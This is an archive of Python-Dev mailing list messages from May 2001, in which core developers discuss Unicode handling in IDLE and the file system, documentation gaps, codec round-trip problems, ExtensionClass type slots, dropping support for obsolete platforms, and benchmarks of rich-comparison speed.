--Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Sun May 13 23:51:17 2001 From: guido@digicool.com (Guido van Rossum) Date: Sun, 13 May 2001 17:51:17 -0500 Subject: [Python-Dev] IDLE and non-ASCII characters In-Reply-To: Your message of "Fri, 11 May 2001 22:53:55 +0200." <200105112053.WAA15657@pandora.informatik.hu-berlin.de> References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> Message-ID: <200105132251.RAA21344@cj20424-a.reston1.va.home.com> > Thanks to a bug report I got, I noticed for the first time that you > cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell > prompt, you may get > > >>> s='äö' > UnicodeError: ASCII encoding error: ordinal not in range(128) This doesn't bother me, because I don't know how to enter such characters with my US keyboard anyway. :-) :-) > Likewise, when trying to save a file that has non-ASCII characters, > you get a traceback. Yes, this has bitten me once. It was very painful (I lost a few hours worth of writing). In other words, I agree it's a problem! > Now, I think I understand all the causes of the problem (Tkinter > returning Unicode objects, and so on). However, I'm curious whether > anybody has proposals on how to deal with it. Not me -- unfortunately, there are too many alternatives to IDLE to be able to justify working on it much. > For saving text files, if Python had an encoding directive, things > might be easier :-) For the shell prompt, I've no idea how to solve > this best. > > So any suggestions are welcome. Ditto. Postscript: using cut and paste, I *can* enter "s='äö'" in IDLE at the Python prompt, both on Linux and on Windows 98. It prints as '\xe4\xf6' on both systems. What changed? 
--Guido van Rossum (home page: http://www.python.org/~guido/) From Mike.Olson@fourthought.com Mon May 14 02:02:03 2001 From: Mike.Olson@fourthought.com (Mike Olson) Date: Sun, 13 May 2001 19:02:03 -0600 Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com> <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de> Message-ID: <3AFF2E8B.31B9ED97@FourThought.com> "Martin v. Loewis" wrote: > > > What if we put these on the implementation, that or came up with a > > standard interface on the node. Then, every DOM imp that wants to be > > compatible with xpath/xslt needs to support this interface? > > > > > > node.ownerDocument.implementation.releaseNode(node) > > > > or > > > > node.py_unlink() > > releaseNode sounds good to me; it is unlikely that W3C would give an > operation that name but a different meaning. Any objections? Should we standardize all of the python xml extensions with a py prefix? pyReleaseNode or py_releaseNode? Then we will never have to worry about a name clash. Mike > > Regards, > Martin -- Mike Olson Principal Consultant mike.olson@fourthought.com (303)583-9900 x 102 Fourthought, Inc. http://Fourthought.com Software-engineering, knowledge-management, XML, CORBA, Linux, Python From MarkH@ActiveState.com Mon May 14 02:37:35 2001 From: MarkH@ActiveState.com (Mark Hammond) Date: Mon, 14 May 2001 11:37:35 +1000 Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames In-Reply-To: Message-ID: [Tim] > Mark (or anyone else who understands all this), were doc changes included? > Can someone please add a briefer user-oriented blurb to Misc/NEWS too? No problem. Where should the "real" documentation go? It seems maybe we need a new sub-heading under the "6.1 - os -- Misc. OS Interface" - something like: 6.1.x - Unicode and the file system - general discussion. 
- Windows specific - Mac specific should that appear. - OS' with no special support (ie, "the rest") Does that make sense? I have made this change to Misc/NEWS. Does this look OK (obviously once I know what to replace "[????]" with :) And-I-will-do-the-registry-docs-at-the-same-time ly, Mark. Index: NEWS =================================================================== RCS file: /cvsroot/python/python/dist/src/Misc/NEWS,v retrieving revision 1.166 diff -r1.166 NEWS 4a5,21 > - Some operating systems now support the concept of a default Unicode > encoding for file system operations. Notably, Windows supports 'mbcs' > as the default. The Macintosh will also adopt this concept in the medium > term, although the default encoding for that platform will be other than > 'mbcs'. > On operating systems that support non-ascii filenames, it is common for > functions that return filenames (such as os.listdir()) to return Python > string objects pre-encoded using the default file system encoding for > the platform. As this encoding is likely to be different from Python's > default encoding, converting this name to a Unicode object before passing > it back to the Operating System would result in a Unicode error, as Python > would attempt to use its default encoding (generally ASCII) rather > than the default encoding for the file system. > In general, this change simply removes surprises when working with > Unicode and the file system, making these operations work as > you expect, increasing the transparency of Unicode objects in this context. > See [????] for more details, including examples. From tim.one@home.com Mon May 14 03:52:22 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 13 May 2001 22:52:22 -0400 Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames In-Reply-To: Message-ID: [Mark Hammond] > ... > Where should the "real" documentation go? It seems maybe we need a > new sub-heading under the "6.1 - os -- Misc.
OS Interface" - something > like: > > 6.1.x - Unicode and the file system > - general discussion. > - Windows specific > - Mac specific should that appear. > - OS' with no special support (ie, "the rest") > > Does that make sense? So far as it goes, yes. I think the manual desperately needs a Unicode section for other reasons, though: from traffic on c.l.py, it's clear that few people can figure out how to do *anything* with Unicode now unless their first name begins with "M" (Mark, Martin, Marc -- definitely not Skip ). There's no overview and there are no examples. The primary string method doesn't even mention Unicode (here paraphrasing questions that pop up): encode([encoding[,errors]]) Return an encoded version of the string. What does "encoded version" mean? Is that another string? An encoding object of some sort? Etc. Default encoding is the current default string encoding. What's the "current default string encoding"? How can I find out? Can't even guess what *type* it has (string? magic object? little integer?). If I don't want the default encoding, how do I specify a different one? What are the possible values? Again, can't even guess the type of the object that needs to be passed for encoding. errors may be given to set a different error handling scheme. The default for errors is 'strict', meaning that encoding errors raise a ValueError. Other possible values are 'ignore' and 'replace'. So what do 'ignore' and 'replace' mean? There's more left unsaid here than a single example could clarify, but there's not even an example -- so people stare at this wholly uncomprehending. If they stumble into the unicode() builtin function (in a different part of the manual, neither referencing nor referenced by the .encode() method), it's no better: unicode(string[, encoding[, errors]]) Decodes string using the codec for encoding. What? Hard to even guess what the function returns. Maybe, from the name, a Unicode string? Error handling is done according to errors.
What? The default behavior is to decode UTF-8 in strict mode, meaning that encoding errors raise ValueError. How do encoding errors arise from a function that *de*codes? See also the codecs module. Which helps, but the relationship between the codecs module and the unicode() function isn't spelled out there either. Look up "encoding" in the index, and you get pointers to base64, quoted-printable and the mimetypes module, which only confuses things more. I don't expect you to fix this , I'm trying to get across that the Unicode docs need work even without new gimmicks. If Fred agrees, I'm sure he'll think of a good place to put the new info too. > I have made this change to Misc/NEWS. Does this look OK > (obviously once I know what to replace "[????]" with :) Absolutely, and I don't even have to read it to say so : once *something* is checked in, we're assured it won't get dropped on the floor come release time, and anyone who has any quibbles with it can check in changes. It's not like checking in a NEWS item can break the std test suite or cause HP-UX to crash. well-not-really-sure-about-the-latter-ly y'rs - tim From barry@digicool.com Mon May 14 05:16:18 2001 From: barry@digicool.com (Barry A. Warsaw) Date: Mon, 14 May 2001 00:16:18 -0400 Subject: [Python-Dev] Ill-defined encoding for CP875? References: <02e501c0dade$ab7f1080$e46940d5@hagrid> Message-ID: <15103.23570.191115.85137@anthem.wooz.org> >>>>> "FL" == Fredrik Lundh writes: FL> (is Jython using exactly the same hashing and dictionary FL> algorithms as CPython? or does it work by accident also under FL> Jython?) Most likely, it's pure accident. Jython's PyDictionary uses a Java Hashtable underneath, so you're dependent on its behavior. -Barry From esr@thyrsus.com Mon May 14 06:20:17 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Mon, 14 May 2001 01:20:17 -0400 Subject: [Python-Dev] State of curses tutorial?
Message-ID: <20010514012017.A6971@thyrsus.com> A user pointed out a typo in the "Curses Programming with Python" tutorial at . While attempting to fix it, I discovered a few things: 1. Somebody seems to have removed Andrew Kuchling's name from it. If it was Andrew, that's OK -- but the reference in the latest version of the library docs still cites him. 2. I don't seem to have the TeX source anymore. Where can I download it? 3. Perhaps it's time to start putting howtos in the nondist part of the CVS tree? -- Eric S. Raymond Power concedes nothing without a demand. It never did, and it never will. Find out just what people will submit to, and you have found out the exact amount of injustice and wrong which will be imposed upon them; and these will continue until they are resisted with either words or blows, or with both. The limits of tyrants are prescribed by the endurance of those whom they oppress. -- Frederick Douglass, August 4, 1857 From greg@cosc.canterbury.ac.nz Mon May 14 06:36:49 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Mon, 14 May 2001 17:36:49 +1200 (NZST) Subject: [Python-Dev] Mac hierarchy backwards In-Reply-To: <20010511145640.9FCB5303181@snelboot.oratrix.nl> Message-ID: <200105140536.RAA18098@s454.cosc.canterbury.ac.nz> Jack Jansen : > MacOS (<= 9) itself doesn't have chdir, because it doesn't believe > in current directories (by design. Well, it does have an equivalent (HSetVol). But it's not used much by Mac software because it's usual to work with full file specifications at all times, at least internally. From the user's point of view, the closest thing to a "current directory" is the way the standard file dialogs remember which directory you were browsing in last. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc.
| greg@cosc.canterbury.ac.nz +--------------------------------------+ From martin@loewis.home.cs.tu-berlin.de Mon May 14 06:38:24 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 14 May 2001 07:38:24 +0200 Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT In-Reply-To: <3AFF2E8B.31B9ED97@FourThought.com> (message from Mike Olson on Sun, 13 May 2001 19:02:03 -0600) References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com> <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de> <3AFF2E8B.31B9ED97@FourThought.com> Message-ID: <200105140538.f4E5cOb01301@mira.informatik.hu-berlin.de> > Should we standardize all of the python xml extensions with a py > prefix? pyReleaseNode or py_releaseNode? Then we will never have to > worry about a name clash. IMO, no. The entire interface together is the Python DOM mapping. In the unlikely event of a name clash, we could still decide to rename the DOM function, or find some other magic (e.g. overloading on the argument count). Regards, Martin From mal@lemburg.com Mon May 14 10:02:19 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Mon, 14 May 2001 11:02:19 +0200 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? References: Message-ID: <3AFF9F1B.A1CDD617@lemburg.com> Tim Peters wrote: > > [M.-A. Lemburg] > > ... > > The "right" thing to do here, is to simply remove cp875 > > from the test for round-tripping. > > I'm relieved you think so, since that's what I already did . > > > It is not the only encoding which fails this test, but it's not > > our fault: the codecs were all generated from the original codec > > maps at the Unicode.org site. > > > > If their mappings are broken, we can't do much about it... other > > than to ignore the error or remove the codec altogether. > > On general principle I don't like either of those -- "in the face of > ambiguity, refuse the temptation to guess". 
It's at least surprising to see > > >>> unicode("?", "cp875").encode("cp875") > '\xfd' > >>> > > now, yes? Would it be better if an ambiguous encoding raised an exception in > "strict" mode? That is, a third choice is to alert users when they're > relying on a broken part of a mapping. The problem is: which part would raise the exception -- the encoder or the decoder ? Here are some more options: * sort the items before creating the encoding table from the decoding one (makes the mapping stable) * map keys which have multiple mappings in the encoding table to None -- this causes their usage to raise an exception (undefined mapping) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal@lemburg.com Mon May 14 10:15:43 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Mon, 14 May 2001 11:15:43 +0200 Subject: [Python-Dev] Unicode docs References: Message-ID: <3AFFA23F.248517E3@lemburg.com> Tim Peters wrote: > > [Mark Hammond] > > ... > > Where should the "real" documentation go? It seems maybe we need a > > new sub-heading under the "6.1 - os -- Misc. OS Interface" - something > > like: > > > > 6.1.x - Unicode and the file system > > - general discussion. > > - Windows specific > > - Mac specific should that appear. > > - OS' with no special support (ie, "the rest") > > > > Does that make sense? > > So far is it goes, yes. I think the manual desperately needs a Unicode > section for other reasons, though: from traffic on c.l.py, it's clear that > few people can figure out how to do *anything* with Unicode now unless their > first name begins with "M" (Mark, Martin, Marc -- definitely not Skip > ). There's no overview and there are no examples. The primary string > method doesn't even mention Unicode (here paraphrasing questions that pop > up): > [...] True. 
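Most of Tim's questions have short answers once there is an example to look at. The sketch below uses modern Python 3 rather than the 2001 API. In Python 3, str is the Unicode type and bytes holds encoded data. Python 2's unicode(data, encoding, errors) corresponds roughly to data.decode(encoding, errors). Codec names are plain strings, and encode() returns a new bytes object. The errors argument chooses between three behaviors: raising ('strict', the default), dropping the character ('ignore'), or substituting a placeholder ('replace').

```python
import sys

text = "caf\u00e9"  # "café" as a str (a Unicode string in Python 3)

# The codec is named by a plain string; encode() returns a new bytes object.
utf8 = text.encode("utf-8")      # b'caf\xc3\xa9'
latin1 = text.encode("latin-1")  # b'caf\xe9'

# errors="strict" is the default: an unencodable character raises
# UnicodeEncodeError, which is a subclass of ValueError.
try:
    text.encode("ascii")
    strict_failed = False
except ValueError:
    strict_failed = True

ignored = text.encode("ascii", "ignore")    # b'caf': the character is dropped
replaced = text.encode("ascii", "replace")  # b'caf?': the character becomes '?'

# Decoding goes the other way, bytes -> str, and takes the same errors argument.
decoded = latin1.decode("latin-1")           # 'café'
mangled = latin1.decode("utf-8", "replace")  # 'caf\ufffd': bad bytes become U+FFFD

# The interpreter-wide default codec used when none is given:
default = sys.getdefaultencoding()  # 'utf-8' on Python 3
```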
The main source of documentation for Unicode still is the proposal itself (Misc/unicode.txt). It needs some reordering and a few examples, but does contain all the information needed to grasp what the implementation intends and how it works. If that's still not enough, there are numerous doc-strings in the codecs.py module, more technical docs in the API reference and finally the unicodeobject.h header file itself. Another source for documentation and examples is the i18n-sig page on python.org. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From jack@oratrix.nl Mon May 14 10:55:26 2001 From: jack@oratrix.nl (Jack Jansen) Date: Mon, 14 May 2001 11:55:26 +0200 Subject: [Python-Dev] Py_FileSystemDefaultEncoding Message-ID: <20010514095527.009E8303181@snelboot.oratrix.nl> I'm not too thrilled with the way the filename encoding stuff was done, with a global var declared in posixmodule.c which is then used by bltinmodule.c. It took me quite a while to figure out why my builds were failing, and how to fix it. And I think other minority platforms may have the same problem, so maybe it's a good idea to move the Py_FileSystemDefaultEncoding declaration to an include file, and do the initialization in a more "common" place? -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From fredrik@pythonware.com Mon May 14 11:18:49 2001 From: fredrik@pythonware.com (Fredrik Lundh) Date: Mon, 14 May 2001 12:18:49 +0200 Subject: [Python-Dev] State of curses tutorial? References: <20010514012017.A6971@thyrsus.com> Message-ID: <007f01c0dc5f$459d3b70$0900a8c0@spiff> eric wrote: > > 1. Somebody seems to have removed Andrew Kuchling's namne from it. 
If it > was Andrew, that's OK -- but the reference in the latest version of the > library docs still cites him. that would be either you (who reworked the document), or andrew (who checked in your changes). looks like fred has already fixed it: Revision 1.13, Tue Apr 10 17:35:31 2001 UTC (4 weeks, 5 days ago) by fdrake Use appropriate markup for multiple authors; LaTeX's \author is not additive; the second occurrence was causing the first author to be dropped. > 2. I don't seem to have the TeX source anymore. Where can I download it? it's in the py-howto CVS tree: http://sourceforge.net/projects/py-howto Cheers /F From loewis@informatik.hu-berlin.de Mon May 14 12:29:21 2001 From: loewis@informatik.hu-berlin.de (Martin von Loewis) Date: Mon, 14 May 2001 13:29:21 +0200 (MEST) Subject: [Python-Dev] IDLE and non-ASCII characters In-Reply-To: <3AFEC72A.33076220@lemburg.com> (mal@lemburg.com) References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> <3AFEC72A.33076220@lemburg.com> Message-ID: <200105141129.NAA22305@pandora.informatik.hu-berlin.de> > I have a bug report assigned to myself which indicates similar > problems with _tkinter and Tk/Tcl. There were other problem > reports on the German Python mailing list going in the same > direction too. > > The basic problem seems to be that Tk/Tcl applies too much > magic to the text widget contents in order to find out the > used encoding and this can easily cause the whole encoding > mechanism to fail. This is actually a different problem. In this scenario here, the user types a non-ASCII character into a text widget, then _tkinter returns a Unicode object (IMO rightfully so). In the other problem, the Python program puts a byte string into a text widget, the user enters some more characters, and _tkinter returns a byte string which does not follow any encoding. > A Tk/Tcl expert should really look into this and fix _tkinter.c > to aid Tk/Tcl in not mixing up the encodings (e.g.
it would > probably be a good idea to recode Python 8bit-strings into > whatever encoding Tk/Tcl assumes as default). Again, this is not the issue here: Both _tkinter and Tk behave absolutely correctly IMO. The question is how IDLE should deal with it. Regards, Martin From loewis@informatik.hu-berlin.de Mon May 14 12:41:26 2001 From: loewis@informatik.hu-berlin.de (Martin von Loewis) Date: Mon, 14 May 2001 13:41:26 +0200 (MEST) Subject: [Python-Dev] IDLE and non-ASCII characters In-Reply-To: <200105132251.RAA21344@cj20424-a.reston1.va.home.com> (message from Guido van Rossum on Sun, 13 May 2001 17:51:17 -0500) References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> <200105132251.RAA21344@cj20424-a.reston1.va.home.com> Message-ID: <200105141141.NAA22376@pandora.informatik.hu-berlin.de> > Postscript: using cut and paste, I *can* enter "s='äö'" in IDLE at the > Python prompt, both on Linux and on Windows 98. It prints as > '\xe4\xf6' on both systems. What changed? Perhaps the Tcl version? That sounds like the issue that Marc talked about: Tk behaves differently when text is entered programmatically (and perhaps through cut-n-paste), as compared to text entered through the keyboard. Using cut-n-paste with Tk 8.3.1, CVS python, X11R6.3 on Solaris 8 still gives me the UnicodeError. Regards, Martin From MarkH@ActiveState.com Mon May 14 13:20:43 2001 From: MarkH@ActiveState.com (Mark Hammond) Date: Mon, 14 May 2001 22:20:43 +1000 Subject: [Python-Dev] Py_FileSystemDefaultEncoding In-Reply-To: <20010514095527.009E8303181@snelboot.oratrix.nl> Message-ID: > I'm not too thrilled with the way the filename encoding stuff was > done, with a My apologies. I did try and publicise the patch as much as possible. A misguided attempt at a low-impact change :( I have checked in the changes you suggest. Mark. From barry@digicool.com Mon May 14 13:54:59 2001 From: barry@digicool.com (Barry A.
Warsaw) Date: Mon, 14 May 2001 08:54:59 -0400 Subject: [Python-Dev] Unicode docs References: <3AFFA23F.248517E3@lemburg.com> Message-ID: <15103.54691.560967.853132@anthem.wooz.org> >>>>> "M" == M writes: M> True. The main source of documentation for Unicode still is the M> proposal itself (Misc/unicode.txt). It needs some reordering M> and a few examples, but does contain all the information needed M> to grasp what the implementation intends and how it works. As a first step, why not PEP-ify that document, much as has been done with the DB-API (version 1 & 2)? It can be an informational PEP. -Barry From esr@thyrsus.com Mon May 14 16:11:57 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Mon, 14 May 2001 11:11:57 -0400 Subject: [Python-Dev] State of curses tutorial? In-Reply-To: <007f01c0dc5f$459d3b70$0900a8c0@spiff>; from fredrik@pythonware.com on Mon, May 14, 2001 at 12:18:49PM +0200 References: <20010514012017.A6971@thyrsus.com> <007f01c0dc5f$459d3b70$0900a8c0@spiff> Message-ID: <20010514111157.C10920@thyrsus.com> Fredrik Lundh : > it's in the py-howto CVS tree: > > http://sourceforge.net/projects/py-howto What module is the Python-HOWTO in? -- Eric S. Raymond "The best we can hope for concerning the people at large is that they be properly armed."
-- Alexander Hamilton, The Federalist Papers at 184-188 From skip@pobox.com (Skip Montanaro) Mon May 14 16:54:54 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Mon, 14 May 2001 10:54:54 -0500 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> Message-ID: <15103.65486.61021.328424@beluga.mojam.com> Martin> That *should* work, except that it also has its 'methods' field Martin> where tp_traverse would go, and its class_flags field where Martin> tp_clear would go. Okay, so I'm completely confused now. I extended the definition of ECTypeType to include this after the doc string slot:

    (traverseproc)0,            /* tp_traverse */
    (inquiry)0,                 /* tp_clear */
    (richcmpfunc)0,             /* rich comparisons */
    0L,                         /* weak reference enabler */

#ifdef COUNT_ALLOCS
    /* these must be last */
    0,                          /* tp_alloc */
    0,                          /* tp_free */
    0,                          /* tp_maxalloc */
    (struct _typeobject *)0,    /* tp_next */
#endif

When I looked at the definition of ECType, after the doc string I saw

    METHOD_CHAIN(ExtensionClass_methods)

as Martin indicated. I can't simply insert the same zeroes at the end of the ECType def'n as I did at the end of the ECTypeType definition. Where does this METHOD_CHAIN thing go? I looked at the def'n of struct _typeobject in Include/object.h but didn't see a slot that looked suitable. FWIW, when I build Python and PyGtk with Py_DEBUG defined as Neil suggested, I get

    Fatal Python error: UNREF invalid object

when I run my failing script. This is with and without making any changes to ECType or ECTypeType. Skip From sdm7g@Virginia.EDU Mon May 14 18:04:56 2001 From: sdm7g@Virginia.EDU (Steven D.
Majewski) Date: Mon, 14 May 2001 13:04:56 -0400 (EDT) Subject: [Python-Dev] deprecated platforms Message-ID: Jack asked me about: https://sourceforge.net/tracker/?func=detail&aid=420601&group_id=5470&atid=105470 which concerns removing the support for --with-next-framework from the build procedure. I'm all for removing it: it's broken for OSX, if it worked, it doesn't do the whole job ( I think framework support should eventually be added for OSX with a separate post-build script -- a real framework should encapsulate all of the python libs, docs and header files in one bundle. ) nobody seems to know if it still works on Next or OpenStep. However, I said I thought there ought to be some sort of official procedure for removing platform support. This doesn't seem to be addressed in either PEP 4 (Deprecation of Standard Modules) or PEP 5 (Guidelines for Language Evolution). I don't think it needs to be as involved a process as PEP 4 or 5 -- it's a more reversible decision than removing a feature from the language. Although, removing a platform dependent feature -- like in the long discussion about case sensitivity -- may be a bigger deal. But I'm really thinking more about things like the Next case -- where there are build options and #ifdefs that, as far as we know, haven't been tested in several versions. ( Believe it or not, there are still folks hanging dearly onto their black NeXT cubes, and finding them useful -- but I have no idea if any of them are using Python, and there are lots of users out there whom we only hear from when they discover a problem. ) Perhaps there should be some sort of "Last Call for Platform Saviour" : if nobody steps forward who is willing to do test builds on that platform, support may be removed if maintaining it is getting in the way. Any thoughts or opinions on this? Are there any other platforms where this might become an issue ? If this looks like it's unlikely to crop up again, then maybe we don't need to bother with a 'policy'.
What about support for particular compilers and build environments: (Borland C on Windows and MPW on Mac are two examples of "minority" compilers.) BTW: As I've thought more about this particular issue (--with-next-framework) I don't think it's as big an issue -- removing that switch isn't going to break the build entirely (I think!). Pulling out all of the #ifdefs for Next would be a larger issue, but that hasn't been proposed (yet). If the consensus is that this isn't a big enough issue, in general, to need an official policy, then I vote to pull it out and see if anyone screams. -- Steve Majewski From guido@digicool.com Mon May 14 21:53:26 2001 From: guido@digicool.com (Guido van Rossum) Date: Mon, 14 May 2001 15:53:26 -0500 Subject: [Python-Dev] deprecated platforms In-Reply-To: Your message of "Mon, 14 May 2001 13:04:56 -0400." References: Message-ID: <200105142053.PAA24202@cj20424-a.reston1.va.home.com> I can't really add much to this discussion, since I have *absolutely* *no* *idea* what kind of framework we're talking about here... I agree with Steve that we shouldn't be too scared of removing support for obsolete platforms. People hanging on to obsolete platforms may as well hang on to obsolete Python versions... --Guido van Rossum (home page: http://www.python.org/~guido/) From martin@loewis.home.cs.tu-berlin.de Mon May 14 20:40:21 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 14 May 2001 21:40:21 +0200 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <15103.65486.61021.328424@beluga.mojam.com> (skip@pobox.com) References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> <15103.65486.61021.328424@beluga.mojam.com> Message-ID: <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de> > Okay, so I'm completely confused now.
I extended the definition of > ECTypeType to include this after the doc string slot: > > (traverseproc)0, /* tp_traverse */ > (inquiry)0, /* tp_clear */ > (richcmpfunc)0, /* rich comparisons */ > 0L, /* weak reference enabler */ > > #ifdef COUNT_ALLOCS > /* these must be last */ > 0, /* tp_alloc */ > 0, /* tp_free */ > 0, /* tp_maxalloc */ > (struct _typeobject *)0, /* tp_next */ > #endif Why did you do that? ECTypeType has the right data type (PyTypeObject). It is the instances of PyExtensionClass that are troubling. > When I looked at the definition of ECType, after the doc string I saw > > METHOD_CHAIN(ExtensionClass_methods) > > as Martin indicated. I can't simply insert the same zeroes at the end of > the ECType def'n as I did at the end of the ECTypeType definition. Of course not. ECType is of type PyExtensionClass, not of type PyTypeObject. Those are similar, but not equal. > Where does this METHOD_CHAIN thing go? I looked at the def'n of > struct _typeobject in Include/object.h but didn't see a slot that > looked suitable. Just have a look at ExtensionClass.h instead. > FWIW, when I build Python and PyGtk with Py_DEBUG defined as Neil suggested, > I get > > Fatal Python error: UNREF invalid object > > when I run my failing script. This is with and without making any changes > to ECType or ECTypeType. BTW, what version of PyGtk did you try to compile? I've tried the 0.7.0-dont-use, and it can run examples/testgtk without major problems (the example did need some updates, since it is apparently outdated). My Gtk version was 1.2, on Linux. In any case, I think you need to analyse this in a debugger.
Regards, Martin From tim@digicool.com Mon May 14 21:12:44 2001 From: tim@digicool.com (Tim Peters) Date: Mon, 14 May 2001 16:12:44 -0400 Subject: [Python-Dev] Comparison speed Message-ID: Here's a simple test program:

    from time import clock

    indices = [1] * 100000

    def doit():
        s = clock()
        i = 0
        while i < 100000:
            "ab" < "cd"
            i += 1
        f = clock()
        return f - s

    for i in xrange(10):
        print "%.3f" % doit()

And here's output from 2.0, 2.1 and current CVS:

    C:\Code\python\dist\src\PCbuild>\python20\python timech.py
    0.107 0.106 0.109 0.106 0.106 0.106 0.106 0.106 0.105 0.106
    C:\Code\python\dist\src\PCbuild>\python21\python timech.py
    0.118 0.118 0.117 0.118 0.117 0.118 0.117 0.118 0.117 0.118
    C:\Code\python\dist\src\PCbuild>python timech.py
    0.119 0.117 0.118 0.117 0.118 0.117 0.118 0.117 0.118

So "something happened" between 2.0 and 2.1 to slow this overall by 10%. string_compare hasn't changed, so rich comparisons are a good guess. Note that the more obvious timing loop obscures the issue:

    def doit():
        s = clock()
        for i in indices:
            "ab" < "cd"
        f = clock()
        return f - s

    C:\Code\python\dist\src\PCbuild>\python20\python timech.py
    0.070 0.069 0.069 0.070 0.069 0.069 0.069 0.070 0.069 0.069
    C:\Code\python\dist\src\PCbuild>\python21\python timech.py
    0.076 0.076 0.076 0.076 0.076 0.077 0.076 0.076 0.076 0.076
    C:\Code\python\dist\src\PCbuild>python timech.py
    0.069 0.070 0.070 0.069 0.069 0.070 0.070 0.069 0.070 0.069

for-loops are faster in current CVS than in 2.0 or 2.1, and that cancels out the comparison slowdown.
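For readers who want to repeat this measurement on a current interpreter, here is a minimal sketch using the standard timeit module. It assumes Python 3 (time.clock was removed in Python 3.8 and print is a function), and it is not Tim's script. It times the same two kinds of comparison, str < str and int < int. The operands are bound in the setup code rather than written as literals, so each timed statement compares two names.

```python
import timeit


def bench(stmt, setup="pass", number=100_000, repeat=10):
    """Return `repeat` timings (seconds), each for `number` runs of `stmt`."""
    # timeit runs setup and stmt in the same function namespace, so the
    # names bound in setup are visible to the timed statement.
    return timeit.repeat(stmt, setup=setup, number=number, repeat=repeat)


# The two comparison kinds timed in the message: str < str and int < int.
CASES = [
    ("str <", 'a, b = "ab", "cd"', "a < b"),
    ("int <", "a, b = 2, 3", "a < b"),
]

if __name__ == "__main__":
    for label, setup, stmt in CASES:
        timings = bench(stmt, setup=setup)
        print(label, " ".join("%.3f" % t for t in timings))
```

Absolute numbers from a modern CPython are not comparable with the 2001 figures above. Only the relative cost of the two cases means anything.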
If we try it with a type of comparison that avoids the richcmp machinery (int < int is special-cased in ceval), current CVS is actually faster than 2.0:

    def doit():
        s = clock()
        for i in indices:
            2 < 3
        f = clock()
        return f - s

    C:\Code\python\dist\src\PCbuild>\python20\python timech.py
    0.056 0.056 0.056 0.056 0.055 0.056 0.058 0.058 0.055 0.056
    C:\Code\python\dist\src\PCbuild>\python21\python timech.py
    0.059 0.059 0.059 0.060 0.060 0.059 0.059 0.060 0.059 0.059
    C:\Code\python\dist\src\PCbuild>python timech.py
    0.053 0.052 0.052 0.053 0.053 0.052 0.052 0.054 0.052 0.053
    C:\Code\python\dist\src\PCbuild>

This also shows that 2.1 was a bit more slothful than 2.0 for some reason other than richcmps. These were all done on a Win2K box; timings vary too much on a Win9x box to be useful. Anybody care to take a stab at making the new richcmp and/or coerce code ugly again? speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs - tim From martin@loewis.home.cs.tu-berlin.de Mon May 14 21:34:35 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 14 May 2001 22:34:35 +0200 Subject: [Python-Dev] deprecated platforms Message-ID: <200105142034.f4EKYZs05805@mira.informatik.hu-berlin.de> > I'm all for removing it: So am I. There are way too many build options for building Python on the Mac-like systems already (e.g. after that change, you still have --with-dyld - or rather the option of still building .o extensions). If it is clearly broken (even if only on OSX), it should be removed. Anybody interested in the flag would need to make it work correctly before it can be revived. > However, I said I thought there ought to be some sort of official > procedure for removing platform support. I don't think such a procedure is necessary. It is not that any end user would be concerned; building Python is an activity of system administrators.
The other PEPs are there because changing the language or removing modules might break *applications* that used to work after an upgrade of Python. With removed platform support, nothing will break - installations would continue to use the last release that did support that platform. Regards, Martin From martin@loewis.home.cs.tu-berlin.de Mon May 14 23:06:57 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Tue, 15 May 2001 00:06:57 +0200 Subject: [Python-Dev] Comparison speed Message-ID: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de> > Anybody care to take a stab at making the new richcmp and/or coerce > code ugly again? When stepping through the code, I also missed support for the relationship between identity and equality. E.g. in PyObject_RichCompare, I'd expect

    if (v == w) {
        switch (op) {
